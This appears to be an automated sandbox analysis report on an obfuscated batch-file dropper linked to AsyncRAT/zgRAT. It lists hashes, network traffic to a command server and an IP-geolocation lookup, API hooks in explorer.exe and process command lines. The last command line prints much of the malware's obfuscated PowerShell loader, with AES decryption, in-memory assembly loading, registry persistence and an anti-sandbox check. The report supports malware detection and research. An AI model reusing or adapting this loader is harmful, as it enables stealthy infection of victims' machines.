                                                                                                    Preview:ElfChnk......................................n...r..)U......................................................................2..#............................................=..........................................................................................................................._...............8...........................f...................M...c...........................p...................................&...................................................................................**...............oI...........}k..&.......}k.....R.H............A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

                                                                                                    \Device\Null

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\more.com
                                                                                                    File Type:ASCII text, with very long lines (4365), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4922
                                                                                                    Entropy (8bit):5.481345845991629
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:PFHDRp5OkuKvfHxRvV0s87Qo25k2gN23b:PZuKzE2W2a23b
                                                                                                    MD5:6B54F06DFD7D8CF5193C2A467E120043
                                                                                                    SHA1:12399F5D1FB9CEED0D1282ACDEB2AD2F5936464E
                                                                                                    SHA-256:05B4250BF1AA9AC5A48815F5ED71727F2F7353347569CF4C9C90E6AC31868A97
                                                                                                    SHA-512:F17FF75A281A01B94F30F2FC193005D4E9DFDE1D248F6D447E74F629821272FF577D980E66DA381CD6BBD5532753E719E3673E3CA17EF75A710F111254129EDF
                                                                                                    Malicious:false
                                                                                                    Preview:Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function cuoF($vrVB){ Invoke-Expression -Verbose -Debug '$TaCK=35[S35ys35te35m35.S35e35cu35r35i35t35y35.35C35ry35pt35o35g35r35ap35hy35.35A35e35s35]:35:35C35r35e35a35te35(35);'.Replace('35', ''); Invoke-Expression -InformationAction Ignore '$TaCK.3sMo3sde3s=[3sS3sys3st3sem3s.3sS3se3sc3su3sr3sit3sy.3sC3sr3sy3spt3sog3sr3sa3sp3sh3sy.3sC3si3sp3sh3se3srM3so3sde3s]3s:3s:3sC3sBC3s;'.Replace('3s', ''); Invoke-Expression -Verbose -Debug -InformationAction Ignore '$TaCK.sRPasRddsRinsRgsR=[sRSsRyssRtsResRmsR.sRSsResRcusRrisRtsRysR.sRCrsRypsRtsRosRgsRrsRapsRhsRysR.sRPsRasRddsRisRngsRMsRosRdsResR]:sR:sRPsRKsRCsRSsR7;'.Replace('sR', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$TaCK.6iKe6iy=6i[S6iy6ist6ie6im.6iC6io6in6iv6ie6ir6it]6i::6iF6ir6io6imB6ias6ie6i66i46iS6itr6ii6in6ig6i("6i

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:DOS batch file, ASCII text, with very long lines (5471), with CRLF line terminators
                                                                                                    Entropy (8bit):6.031887642812717
                                                                                                    TrID:
                                                                                                      File name:uy2g7z.bat
                                                                                                      File size:6'277'741 bytes
                                                                                                      MD5:8c978ee76d617722aa91e4541333aed8
                                                                                                      SHA1:3f5b77c057ef8b64aa0da7e9a6af7508eb76605a
                                                                                                      SHA256:973a40fc27269affe13538285a98317ccdbc0846d234cc7d480621bf3944cd2e
                                                                                                      SHA512:ba10ca56d5e407956bac6240df8553d8c508221244616566bf06761ed176d4ffff3bce1cad030a64b6797e9a2b4c65c3ca5027d93cb6f2486a5b8841bcd087c4
                                                                                                      SSDEEP:49152:zyeQsad1CzzSrPqyKyOZgkdwsQNsCp0jAXTWoIVTUKS8ccfdeDRVi1yaOKtMjY:D
                                                                                                      TLSH:D256333815635FBB18ECD22AD8DF7C793B9E5E8548B16CDF42A51C0F0A8E65B391B804
                                                                                                      File Content Preview:@echo off..%wpVuIWTfFebwqsxppHRCnZQffKGCPUeTNZxauqnktyLoIUVsjhuqgDIx%@%QpXprpLahIrVwVZuGjPoCxkPosHzONkrZCDa%%VcjZoAlExNmvWzuSjVteibYHlluy%e%VUrYeLhGooWYlQFveRnQyQGkWhTdBOcfNEBSUwSOmmUHwgXksmguhHBfnhc%%RdeAmRkHoNAHZyDlVZNPkIKoHIYgcwENuVWjiuvFVqVFMyuIepjotm

                                                                                                      File Icon

                                                                                                      Icon Hash:9686878b929a9886

                                                                                                      Network Behavior

                                                                                                      Suricata IDS Alerts

                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2025-03-13T10:26:07.671914+01002035595ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert145.94.31.1764782192.168.2.549713TCP

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Mar 13, 2025 10:26:07.056963921 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:26:07.061794043 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:26:07.061887026 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:26:07.095455885 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:26:07.100281954 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:26:07.664104939 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:26:07.664125919 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:26:07.664187908 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:26:07.667216063 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:26:07.671914101 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:26:07.837944984 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:26:08.050350904 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:26:08.050417900 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:26:08.916851997 CET49714443192.168.2.5195.201.57.90
                                                                                                      Mar 13, 2025 10:26:08.916897058 CET44349714195.201.57.90192.168.2.5
                                                                                                      Mar 13, 2025 10:26:08.917062044 CET49714443192.168.2.5195.201.57.90
                                                                                                      Mar 13, 2025 10:26:08.918525934 CET49714443192.168.2.5195.201.57.90
                                                                                                      Mar 13, 2025 10:26:08.918543100 CET44349714195.201.57.90192.168.2.5
                                                                                                      Mar 13, 2025 10:26:11.102579117 CET44349714195.201.57.90192.168.2.5
                                                                                                      Mar 13, 2025 10:26:11.102658033 CET49714443192.168.2.5195.201.57.90
                                                                                                      Mar 13, 2025 10:26:11.123305082 CET49714443192.168.2.5195.201.57.90
                                                                                                      Mar 13, 2025 10:26:11.123337030 CET44349714195.201.57.90192.168.2.5
                                                                                                      Mar 13, 2025 10:26:11.123677969 CET44349714195.201.57.90192.168.2.5
                                                                                                      Mar 13, 2025 10:26:11.191998959 CET49714443192.168.2.5195.201.57.90
                                                                                                      Mar 13, 2025 10:26:11.204624891 CET49714443192.168.2.5195.201.57.90
                                                                                                      Mar 13, 2025 10:26:11.252336025 CET44349714195.201.57.90192.168.2.5
                                                                                                      Mar 13, 2025 10:26:12.114990950 CET44349714195.201.57.90192.168.2.5
                                                                                                      Mar 13, 2025 10:26:12.115073919 CET44349714195.201.57.90192.168.2.5
                                                                                                      Mar 13, 2025 10:26:12.115154982 CET49714443192.168.2.5195.201.57.90
                                                                                                      Mar 13, 2025 10:26:12.272593021 CET49714443192.168.2.5195.201.57.90
                                                                                                      Mar 13, 2025 10:26:12.640208960 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:26:12.644963026 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:26:12.645023108 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:26:12.649691105 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:26:12.939649105 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:26:13.059101105 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:26:13.059168100 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:26:13.097604990 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:26:13.102288961 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:26:13.104953051 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:26:13.109613895 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:26:13.109672070 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:26:13.114326954 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:26:15.616295099 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:26:15.621185064 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:26:15.622175932 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:26:15.626879930 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:26:16.133096933 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:26:16.140393019 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:26:16.141879082 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:26:16.148300886 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:26:17.209269047 CET4970580192.168.2.5142.250.181.227
                                                                                                      Mar 13, 2025 10:26:17.209462881 CET4969680192.168.2.52.16.164.49
                                                                                                      Mar 13, 2025 10:26:17.209533930 CET4970280192.168.2.52.16.164.49
                                                                                                      Mar 13, 2025 10:26:17.214529991 CET8049705142.250.181.227192.168.2.5
                                                                                                      Mar 13, 2025 10:26:17.214596033 CET4970580192.168.2.5142.250.181.227
                                                                                                      Mar 13, 2025 10:26:17.215002060 CET80496962.16.164.49192.168.2.5
                                                                                                      Mar 13, 2025 10:26:17.215013981 CET80497022.16.164.49192.168.2.5
                                                                                                      Mar 13, 2025 10:26:17.215050936 CET4969680192.168.2.52.16.164.49
                                                                                                      Mar 13, 2025 10:26:17.215121031 CET4970280192.168.2.52.16.164.49
                                                                                                      Mar 13, 2025 10:26:41.160809040 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:26:41.165563107 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:27:05.302674055 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:27:05.307378054 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:27:05.307549953 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:27:05.312237024 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:27:08.559302092 CET4968880192.168.2.52.16.164.49
                                                                                                      Mar 13, 2025 10:27:08.560573101 CET4968980192.168.2.52.16.164.49
                                                                                                      Mar 13, 2025 10:27:08.561297894 CET4969080192.168.2.52.16.164.49
                                                                                                      Mar 13, 2025 10:27:08.561835051 CET4969180192.168.2.52.16.164.49
                                                                                                      Mar 13, 2025 10:27:08.564280033 CET80496882.16.164.49192.168.2.5
                                                                                                      Mar 13, 2025 10:27:08.564320087 CET4968880192.168.2.52.16.164.49
                                                                                                      Mar 13, 2025 10:27:08.565385103 CET80496892.16.164.49192.168.2.5
                                                                                                      Mar 13, 2025 10:27:08.565449953 CET4968980192.168.2.52.16.164.49
                                                                                                      Mar 13, 2025 10:27:08.566082001 CET80496902.16.164.49192.168.2.5
                                                                                                      Mar 13, 2025 10:27:08.566128969 CET4969080192.168.2.52.16.164.49
                                                                                                      Mar 13, 2025 10:27:08.566647053 CET80496912.16.164.49192.168.2.5
                                                                                                      Mar 13, 2025 10:27:08.566698074 CET4969180192.168.2.52.16.164.49
                                                                                                      Mar 13, 2025 10:27:30.332823038 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:27:30.337598085 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:27:55.348452091 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:27:55.353176117 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:28:12.902709961 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:28:12.907541037 CET47824971345.94.31.176192.168.2.5
                                                                                                      Mar 13, 2025 10:28:12.907589912 CET497134782192.168.2.545.94.31.176
                                                                                                      Mar 13, 2025 10:28:12.912321091 CET47824971345.94.31.176192.168.2.5

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Mar 13, 2025 10:26:08.897032022 CET6510153192.168.2.51.1.1.1
                                                                                                      Mar 13, 2025 10:26:08.904476881 CET53651011.1.1.1192.168.2.5

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Mar 13, 2025 10:26:08.897032022 CET192.168.2.51.1.1.10xdd2bStandard query (0)ipwho.isA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Mar 13, 2025 10:26:08.904476881 CET1.1.1.1192.168.2.50xdd2bNo error (0)ipwho.is195.201.57.90A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • ipwho.is

                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.549714195.201.57.904438748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-03-13 09:26:11 UTC150OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
                                                                                                      Host: ipwho.is
                                                                                                      Connection: Keep-Alive
                                                                                                      2025-03-13 09:26:12 UTC223INHTTP/1.1 200 OK
                                                                                                      Date: Thu, 13 Mar 2025 09:26:11 GMT
                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Server: ipwhois
                                                                                                      Access-Control-Allow-Headers: *
                                                                                                      X-Robots-Tag: noindex
                                                                                                      2025-03-13 09:26:12 UTC1064INData Raw: 34 31 63 0d 0a 7b 0a 20 20 20 20 22 41 62 6f 75 74 20 55 73 22 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 70 77 68 6f 69 73 2e 69 6f 22 2c 0a 20 20 20 20 22 69 70 22 3a 20 22 37 33 2e 31 33 2e 31 33 35 2e 32 31 39 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 74 79 70 65 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 20 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 20 22 4e 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 50 65 6e 6e 73
                                                                                                      Data Ascii: 41c{ "About Us": "https:\/\/ipwhois.io", "ip": "73.13.135.219", "success": true, "type": "IPv4", "continent": "North America", "continent_code": "NA", "country": "United States", "country_code": "US", "region": "Penns


                                                                                                      Code Manipulations

                                                                                                      User Modules

                                                                                                      Hook Summary

                                                                                                      Function NameHook TypeActive in Processes
                                                                                                      ZwEnumerateKeyINLINEexplorer.exe
                                                                                                      ZwQueryKeyINLINEexplorer.exe
                                                                                                      NtQuerySystemInformationINLINEexplorer.exe
                                                                                                      ZwResumeThreadINLINEexplorer.exe
                                                                                                      NtDeviceIoControlFileINLINEexplorer.exe
                                                                                                      ZwDeviceIoControlFileINLINEexplorer.exe
                                                                                                      NtEnumerateKeyINLINEexplorer.exe
                                                                                                      NtQueryDirectoryFileINLINEexplorer.exe
                                                                                                      ZwEnumerateValueKeyINLINEexplorer.exe
                                                                                                      ZwQuerySystemInformationINLINEexplorer.exe
                                                                                                      NtResumeThreadINLINEexplorer.exe
                                                                                                      RtlGetNativeSystemInformationINLINEexplorer.exe
                                                                                                      ZwCreateUserProcessINLINEexplorer.exe
                                                                                                      NtQueryDirectoryFileExINLINEexplorer.exe
                                                                                                      NtQueryKeyINLINEexplorer.exe
                                                                                                      NtEnumerateValueKeyINLINEexplorer.exe
                                                                                                      ZwQueryDirectoryFileExINLINEexplorer.exe
                                                                                                      NtCreateUserProcessINLINEexplorer.exe
                                                                                                      ZwQueryDirectoryFileINLINEexplorer.exe
                                                                                                      OpenThreadINLINEexplorer.exe
                                                                                                      OpenProcessINLINEexplorer.exe

                                                                                                      Processes

                                                                                                      Process: explorer.exe, Module: ntdll.dll
                                                                                                      Function NameHook TypeNew Data
                                                                                                      ZwEnumerateKeyINLINE0xE9 0x98 0x83 0x32 0x2D 0xDF
                                                                                                      ZwQueryKeyINLINE0xE9 0x9A 0xA3 0x33 0x30 0x0F
                                                                                                      NtQuerySystemInformationINLINE0xE9 0x92 0x23 0x32 0x2B 0xBF
                                                                                                      ZwResumeThreadINLINE0xE9 0x90 0x03 0x32 0x28 0x8F
                                                                                                      NtDeviceIoControlFileINLINE0xE9 0x96 0x63 0x33 0x37 0x7F
                                                                                                      ZwDeviceIoControlFileINLINE0xE9 0x96 0x63 0x33 0x37 0x7F
                                                                                                      NtEnumerateKeyINLINE0xE9 0x98 0x83 0x32 0x2D 0xDF
                                                                                                      NtQueryDirectoryFileINLINE0xE9 0x90 0x03 0x32 0x2C 0xCF
                                                                                                      ZwEnumerateValueKeyINLINE0xE9 0x9C 0xC3 0x33 0x31 0x1F
                                                                                                      ZwQuerySystemInformationINLINE0xE9 0x92 0x23 0x32 0x2B 0xBF
                                                                                                      NtResumeThreadINLINE0xE9 0x90 0x03 0x32 0x28 0x8F
                                                                                                      RtlGetNativeSystemInformationINLINE0xE9 0x92 0x23 0x32 0x2B 0xBF
                                                                                                      ZwCreateUserProcessINLINE0xE9 0x99 0x93 0x31 0x18 0x8F
                                                                                                      NtQueryDirectoryFileExINLINE0xE9 0x9D 0xD3 0x30 0x0A 0xAF
                                                                                                      NtQueryKeyINLINE0xE9 0x9A 0xA3 0x33 0x30 0x0F
                                                                                                      NtEnumerateValueKeyINLINE0xE9 0x9C 0xC3 0x33 0x31 0x1F
                                                                                                      ZwQueryDirectoryFileExINLINE0xE9 0x9D 0xD3 0x30 0x0A 0xAF
                                                                                                      NtCreateUserProcessINLINE0xE9 0x99 0x93 0x31 0x18 0x8F
                                                                                                      ZwQueryDirectoryFileINLINE0xE9 0x90 0x03 0x32 0x2C 0xCF
                                                                                                      Process: explorer.exe, Module: KERNEL32.DLL
                                                                                                      Function NameHook TypeNew Data
                                                                                                      OpenThreadINLINE0xE9 0x92 0x23 0x33 0x3F 0xF1
                                                                                                      OpenProcessINLINE0xE9 0x93 0x33 0x35 0x59 0x91

                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:05:25:32
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uy2g7z.bat" "
                                                                                                      Imagebase:0x7ff662840000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:1
                                                                                                      Start time:05:25:32
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7e2000000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:2
                                                                                                      Start time:05:25:32
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\uy2g7z.bat' -ArgumentList 'wjzJMHoFZaIaceAGUG' -WindowStyle Hidden"
                                                                                                      Imagebase:0x7ff7785e0000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:3
                                                                                                      Start time:05:25:34
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uy2g7z.bat" wjzJMHoFZaIaceAGUG "
                                                                                                      Imagebase:0x7ff662840000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:4
                                                                                                      Start time:05:25:34
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7e2000000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:5
                                                                                                      Start time:05:25:39
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"
                                                                                                      Imagebase:0x7ff7785e0000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:6
                                                                                                      Start time:05:25:41
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\findstr.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\system32\findstr.exe" /i WDS100T2B0A
                                                                                                      Imagebase:0x7ff7edb50000
                                                                                                      File size:36'352 bytes
                                                                                                      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:7
                                                                                                      Start time:05:25:46
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:cmd.exe /c echo function cuoF($vrVB){ Invoke-Expression -Verbose -Debug '$TaCK=35[S35ys35te35m35.S35e35cu35r35i35t35y35.35C35ry35pt35o35g35r35ap35hy35.35A35e35s35]:35:35C35r35e35a35te35(35);'.Replace('35', ''); Invoke-Expression -InformationAction Ignore '$TaCK.3sMo3sde3s=[3sS3sys3st3sem3s.3sS3se3sc3su3sr3sit3sy.3sC3sr3sy3spt3sog3sr3sa3sp3sh3sy.3sC3si3sp3sh3se3srM3so3sde3s]3s:3s:3sC3sBC3s;'.Replace('3s', ''); Invoke-Expression -Verbose -Debug -InformationAction Ignore '$TaCK.sRPasRddsRinsRgsR=[sRSsRyssRtsResRmsR.sRSsResRcusRrisRtsRysR.sRCrsRypsRtsRosRgsRrsRapsRhsRysR.sRPsRasRddsRisRngsRMsRosRdsResR]:sR:sRPsRKsRCsRSsR7;'.Replace('sR', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$TaCK.6iKe6iy=6i[S6iy6ist6ie6im.6iC6io6in6iv6ie6ir6it]6i::6iF6ir6io6imB6ias6ie6i66i46iS6itr6ii6in6ig6i("6ieX6iAI6iQp6iH6iXC6iI6iSA6iu6ir6iB6ic6iL6i+6icB6i4j6i66iW6il6i4f6irm6ib6i76i/6i66ihB6ig6ir6iJ6iH6i26icK6iI6i=");'.Replace('6i', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$TaCK.pJIVpJ=[pJSypJspJtepJmpJ.CpJopJnpJvpJepJrpJtpJ]:pJ:FpJrpJopJmpJBapJsepJ6pJ4pJSpJtpJripJnpJgpJ("pJLypJW7pJocpJepJGopJ3pJ6XpJZpJlpJqpJrpJEpJEpJ5xpJlQpJ=pJ=");'.Replace('pJ', ''); $HzNF=$TaCK.CreateDecryptor(); $gTTC=$HzNF.TransformFinalBlock($vrVB, 0, $vrVB.Length); $HzNF.Dispose(); $TaCK.Dispose(); $gTTC;}function ppFM($vrVB){ Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug '$BYbD=uwNeuww-uwObuwjuwecuwtuw Suwyuwsuwtuweuwmuw.uwIOuw.MuweuwmuwouwryuwStuwruweuwauwmuw(,$vrVB);'.Replace('uw', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose '$aohN=uwNeuww-uwObuwjuwecuwtuw Suwyuwsuwtuweuwmuw.uwIOuw.MuweuwmuwouwryuwStuwruweuwauwmuw;'.Replace('uw', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$rQYH=QuNeQuw-QuObQujQuecQutQu SQuyQusQutQueQumQu.QuIOQu.CQuoQumQupQureQussQuiQuoQunQu.QuGZQuiQupQuSQutQurQueaQum($BYbD, Qu[IQuO.QuCoQumQuprQueQussQuiQuoQunQu.QuCQuoQumpQureQusQusQuiQuonQuMoQudQueQu]Qu:Qu:DQueQucQuoQumQupQureQusQus);'.Replace('Qu', ''); $rQYH.CopyTo($aohN); $rQYH.Dispose(); $BYbD.Dispose(); $aohN.Dispose(); $aohN.ToArray();}function QIGO($vrVB,$BCHx){ Invoke-Expression -Verbose -WarningAction Inquire '$lHpd=oR[SoRysoRteoRmoR.RoReoRfloReoRcoRtoRioRooRnoR.AoRssoReoRmoRboRlyoR]:oR:oRLoRooRaoRd([byte[]]$vrVB);'.Replace('oR', ''); Invoke-Expression -Debug -WarningAction Inquire '$AEjb=$lHpd.OBEnOBtrOByPOBoOBinOBt;'.Replace('OB', ''); Invoke-Expression -Debug '$AEjbR9.IR9nvR9okR9eR9($R9nR9ulR9lR9, $BCHx);'.Replace('R9', '');}function ZAB($lYat){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'vcKCVWMMyKQFoeskiSq;mNFaDYQRq;OvWrknEdQ'; Set-ItemProperty -Path $registryPath -Name 'vcKCVWMMyKQFoeskiSq' -Value $lYat; Set-ItemProperty -Path $registryPath -Name 'mNFaDYQRq' -Value 'eXAIQpHXCISAurBcL+cB4j6Wl4frmb7/6hBgrJH2cKI='; Set-ItemProperty -Path $registryPath -Name 'OvWrknEdQ' -Value 'LyW7oceGo36XZlqrEE5xlQ==';}$sjrS = 'C:\Users\user\Desktop\uy2g7z.bat';$host.UI.RawUI.WindowTitle = $sjrS;$ZyQM=[System.IO.File]::ReadAllText($sjrS).Split([Environment]::NewLine);foreach ($mcTi in $ZyQM) { if ($mcTi.StartsWith('tPpko')) { $eEXA=$mcTi.Substring(5); break; }}ZAB 